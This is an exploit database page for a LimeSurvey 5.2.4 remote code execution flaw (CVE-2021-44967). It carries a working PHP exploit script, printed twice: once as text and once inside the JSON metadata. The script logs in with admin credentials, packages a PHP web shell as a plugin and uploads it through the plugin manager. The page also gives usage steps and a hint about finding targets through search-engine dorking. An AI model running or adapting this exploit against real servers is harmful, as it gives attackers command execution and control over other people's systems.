📄 LimeSurvey 5.2.4 Remote Code Execution_PACKETSTORM:214834

9 / 10

HIGH

AV:N/AC:L/Au:S/C:C/I:C/A:C

Description

Proof of concept exploit for LimeSurvey version 5.2.4 that loads a malicious PHP plugin and executes a reverse shell...

Visit Original Source

Basic Information

ID PACKETSTORM:214834

Published Feb 3, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : LimeSurvey 5.2.4 reverse shell Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.limesurvey.org/ |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: This script is used to exploit vulnerability in LimeSurvey to load a malicious PHP plugin and execute a reverse shell.

(Related : https://packetstorm.news/files/id/189288/ Related CVE numbers: CVE-2021-44967 ) .

[+] save code as poc.php.

[+] Set TArget : line 112

[+] Usage : php poc.php

[+] PayLoad :

<?php

/**
* هذا السكريبت يُستخدم لاستغلال ثغرة CVE-2021-44967 في LimeSurvey لتحميل ملحق PHP خبيث وتنفيذ عكسية Shell.
*/

// تعطيل تحذيرات SSL
$context = stream_context_create([
'ssl' => [
'verify_peer' => false,
'verify_peer_name' => false,
]
]);

// إعدادات الملحق الخبيث
$plugin_name = "ExploitRCE_" . rand(1000, 9999);
$date = date("Y-m-d");
$xml_config = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n";
$xml_config .= "<config>\n";
$xml_config .= " <metadata>\n";
$xml_config .= " <name>$plugin_name</name>\n";
$xml_config .= " <type>plugin</type>\n";
$xml_config .= " <creationDate>$date</creationDate>\n";
$xml_config .= " <lastUpdate>$date</lastUpdate>\n";
$xml_config .= " <version>1.0</version>\n";
$xml_config .= " </metadata>\n";
$xml_config .= " <compatibility>\n";
$xml_config .= " <version>3.0</version>\n";
$xml_config .= " <version>4.0</version>\n";
$xml_config .= " <version>5.0</version>\n";
$xml_config .= " <version>6.0</version>\n";
$xml_config .= " <version>7.0</version>\n";
$xml_config .= " </compatibility>\n";
$xml_config .= "</config>";

// دالة تسجيل الدخول إلى LimeSurvey
function limesurvey_authenticate($url, $username, $password) {
echo "[*] محاولة تسجيل الدخول...\n";
$login_url = "$url/index.php/admin/authentication/sa/login";
$login_page = file_get_contents($login_url, false, $GLOBALS['context']);
preg_match('/name=\"YII_CSRF_TOKEN\" value=\"(.*?)\"/', $login_page, $matches);
$csrf_token = $matches[1] ?? '';

$data = http_build_query([
"YII_CSRF_TOKEN" => $csrf_token,
"authMethod" => "Authdb",
"user" => $username,
"password" => $password,
"login_submit" => "login"
]);

$options = [
"http" => [
"method" => "POST",
"header" => "Content-type: application/x-www-form-urlencoded",
"content" => $data,
]
];

$result = file_get_contents($login_url, false, stream_context_create($options));

if (strpos($result, '/index.php/admin/index') !== false) {
echo "[+] تسجيل الدخول ناجح!\n";
} else {
echo "[-] فشل تسجيل الدخول\n";
exit();
}
}

// رفع وتنفيذ الحمولة الخبيثة
function upload_payload($url, $plugin_name, $payload) {
echo "[*] رفع الحمولة الخبيثة...\n";
$upload_url = "$url/index.php/admin/pluginmanager?sa=upload";

$boundary = "----WebKitFormBoundary" . md5(time());
$data = "--$boundary\r\n";
$data .= "Content-Disposition: form-data; name=\"the_file\"; filename=\"$plugin_name.zip\"\r\n";
$data .= "Content-Type: application/zip\r\n\r\n";
$data .= $payload . "\r\n";
$data .= "--$boundary--\r\n";

$options = [
"http" => [
"method" => "POST",
"header" => "Content-Type: multipart/form-data; boundary=$boundary",
"content" => $data,
]
];

$result = file_get_contents($upload_url, false, stream_context_create($options));

if (strpos($result, 'sa=uploadConfirm') !== false) {
echo "[+] رفع الحمولة ناجح!\n";
} else {
echo "[-] فشل في رفع الحمولة\n";
exit();
}
}

// إعداد الحمولة الخبيثة
$payload = "<?php system(\$_GET['cmd']); ?>";
$zip = new ZipArchive();
$zip_file = tempnam(sys_get_temp_dir(), "exploit") . ".zip";
$zip->open($zip_file, ZipArchive::CREATE);
$zip->addFromString("config.xml", $xml_config);
$zip->addFromString("payload.php", $payload);
$zip->close();
$payload_data = file_get_contents($zip_file);
unlink($zip_file);

// تنفيذ الاستغلال
$url = "http://target-limesurvey.com"; // استبدل بعنوان الهدف
$username = "admin";
$password = "password";

limesurvey_authenticate($url, $username, $password);
upload_payload($url, $plugin_name, $payload_data);

echo "[*] تم تنفيذ الاستغلال بنجاح!\n";

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2026-02-03T20:20:49",
    "description": "Proof of concept exploit for LimeSurvey version 5.2.4 that loads a malicious PHP plugin and executes a reverse shell...",
    "published": "2026-02-03T00:00:00",
    "modified": "2026-02-03T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 LimeSurvey 5.2.4 Remote Code Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:214834",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2021-44967"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : LimeSurvey 5.2.4 reverse shell Vulnerability                                                                                |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |\n    | # Vendor    : https://www.limesurvey.org/                                                                                                 |\n    =============================================================================================================================================\n    \n    POC :\n    \n    [+] Dorking \u0130n Google Or Other Search Enggine.\n    \n    [+] Code Description: This script is used to exploit vulnerability in LimeSurvey to load a malicious PHP plugin and execute a reverse shell.\n    \n       (Related : https://packetstorm.news/files/id/189288/ Related CVE numbers: \tCVE-2021-44967 ) .\n    \t\n    [+] save code as poc.php.\n    \n    [+] Set TArget : line 112\n    \n    [+] Usage : php poc.php\n    \n    [+] PayLoad :\n    \n    <?php\n    \n    /**\n     * \u0647\u0630\u0627 \u0627\u0644\u0633\u0643\u0631\u064a\u0628\u062a \u064a\u064f\u0633\u062a\u062e\u062f\u0645 \u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u062b\u063a\u0631\u0629 CVE-2021-44967 \u0641\u064a LimeSurvey \u0644\u062a\u062d\u0645\u064a\u0644 \u0645\u0644\u062d\u0642 PHP \u062e\u0628\u064a\u062b \u0648\u062a\u0646\u0641\u064a\u0630 \u0639\u0643\u0633\u064a\u0629 Shell.\n     */\n    \n    // \u062a\u0639\u0637\u064a\u0644 \u062a\u062d\u0630\u064a\u0631\u0627\u062a SSL\n    $context = stream_context_create([\n        'ssl' => [\n            'verify_peer' => false,\n            'verify_peer_name' => false,\n        ]\n    ]);\n    \n    // \u0625\u0639\u062f\u0627\u062f\u0627\u062a \u0627\u0644\u0645\u0644\u062d\u0642 \u0627\u0644\u062e\u0628\u064a\u062b\n    $plugin_name = \"ExploitRCE_\" . rand(1000, 9999);\n    $date = date(\"Y-m-d\");\n    $xml_config = \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?>\\n\";\n    $xml_config .= \"<config>\\n\";\n    $xml_config .= \"    <metadata>\\n\";\n    $xml_config .= \"        <name>$plugin_name</name>\\n\";\n    $xml_config .= \"        <type>plugin</type>\\n\";\n    $xml_config .= \"        <creationDate>$date</creationDate>\\n\";\n    $xml_config .= \"        <lastUpdate>$date</lastUpdate>\\n\";\n    $xml_config .= \"        <version>1.0</version>\\n\";\n    $xml_config .= \"    </metadata>\\n\";\n    $xml_config .= \"    <compatibility>\\n\";\n    $xml_config .= \"        <version>3.0</version>\\n\";\n    $xml_config .= \"        <version>4.0</version>\\n\";\n    $xml_config .= \"        <version>5.0</version>\\n\";\n    $xml_config .= \"        <version>6.0</version>\\n\";\n    $xml_config .= \"        <version>7.0</version>\\n\";\n    $xml_config .= \"    </compatibility>\\n\";\n    $xml_config .= \"</config>\";\n    \n    // \u062f\u0627\u0644\u0629 \u062a\u0633\u062c\u064a\u0644 \u0627\u0644\u062f\u062e\u0648\u0644 \u0625\u0644\u0649 LimeSurvey\n    function limesurvey_authenticate($url, $username, $password) {\n        echo \"[*] \u0645\u062d\u0627\u0648\u0644\u0629 \u062a\u0633\u062c\u064a\u0644 \u0627\u0644\u062f\u062e\u0648\u0644...\\n\";\n        $login_url = \"$url/index.php/admin/authentication/sa/login\";\n        $login_page = file_get_contents($login_url, false, $GLOBALS['context']);\n        preg_match('/name=\\\"YII_CSRF_TOKEN\\\" value=\\\"(.*?)\\\"/', $login_page, $matches);\n        $csrf_token = $matches[1] ?? '';\n        \n        $data = http_build_query([\n            \"YII_CSRF_TOKEN\" => $csrf_token,\n            \"authMethod\" => \"Authdb\",\n            \"user\" => $username,\n            \"password\" => $password,\n            \"login_submit\" => \"login\"\n        ]);\n    \n        $options = [\n            \"http\" => [\n                \"method\" => \"POST\",\n                \"header\" => \"Content-type: application/x-www-form-urlencoded\",\n                \"content\" => $data,\n            ]\n        ];\n        \n        $result = file_get_contents($login_url, false, stream_context_create($options));\n        \n        if (strpos($result, '/index.php/admin/index') !== false) {\n            echo \"[+] \u062a\u0633\u062c\u064a\u0644 \u0627\u0644\u062f\u062e\u0648\u0644 \u0646\u0627\u062c\u062d!\\n\";\n        } else {\n            echo \"[-] \u0641\u0634\u0644 \u062a\u0633\u062c\u064a\u0644 \u0627\u0644\u062f\u062e\u0648\u0644\\n\";\n            exit();\n        }\n    }\n    \n    // \u0631\u0641\u0639 \u0648\u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u062d\u0645\u0648\u0644\u0629 \u0627\u0644\u062e\u0628\u064a\u062b\u0629\n    function upload_payload($url, $plugin_name, $payload) {\n        echo \"[*] \u0631\u0641\u0639 \u0627\u0644\u062d\u0645\u0648\u0644\u0629 \u0627\u0644\u062e\u0628\u064a\u062b\u0629...\\n\";\n        $upload_url = \"$url/index.php/admin/pluginmanager?sa=upload\";\n        \n        $boundary = \"----WebKitFormBoundary\" . md5(time());\n        $data = \"--$boundary\\r\\n\";\n        $data .= \"Content-Disposition: form-data; name=\\\"the_file\\\"; filename=\\\"$plugin_name.zip\\\"\\r\\n\";\n        $data .= \"Content-Type: application/zip\\r\\n\\r\\n\";\n        $data .= $payload . \"\\r\\n\";\n        $data .= \"--$boundary--\\r\\n\";\n        \n        $options = [\n            \"http\" => [\n                \"method\" => \"POST\",\n                \"header\" => \"Content-Type: multipart/form-data; boundary=$boundary\",\n                \"content\" => $data,\n            ]\n        ];\n        \n        $result = file_get_contents($upload_url, false, stream_context_create($options));\n        \n        if (strpos($result, 'sa=uploadConfirm') !== false) {\n            echo \"[+] \u0631\u0641\u0639 \u0627\u0644\u062d\u0645\u0648\u0644\u0629 \u0646\u0627\u062c\u062d!\\n\";\n        } else {\n            echo \"[-] \u0641\u0634\u0644 \u0641\u064a \u0631\u0641\u0639 \u0627\u0644\u062d\u0645\u0648\u0644\u0629\\n\";\n            exit();\n        }\n    }\n    \n    // \u0625\u0639\u062f\u0627\u062f \u0627\u0644\u062d\u0645\u0648\u0644\u0629 \u0627\u0644\u062e\u0628\u064a\u062b\u0629\n    $payload = \"<?php system(\\$_GET['cmd']); ?>\";\n    $zip = new ZipArchive();\n    $zip_file = tempnam(sys_get_temp_dir(), \"exploit\") . \".zip\";\n    $zip->open($zip_file, ZipArchive::CREATE);\n    $zip->addFromString(\"config.xml\", $xml_config);\n    $zip->addFromString(\"payload.php\", $payload);\n    $zip->close();\n    $payload_data = file_get_contents($zip_file);\n    unlink($zip_file);\n    \n    // \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644\n    $url = \"http://target-limesurvey.com\"; // \u0627\u0633\u062a\u0628\u062f\u0644 \u0628\u0639\u0646\u0648\u0627\u0646 \u0627\u0644\u0647\u062f\u0641\n    $username = \"admin\";\n    $password = \"password\";\n    \n    limesurvey_authenticate($url, $username, $password);\n    upload_payload($url, $plugin_name, $payload_data);\n    \n    echo \"[*] \u062a\u0645 \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0627\u0633\u062a\u063a\u0644\u0627\u0644 \u0628\u0646\u062c\u0627\u062d!\\n\";\n    \n    \n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/214834",
    "cvss": {
        "score": 9,
        "severity": "HIGH",
        "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
        "version": "2.0"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/214834/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply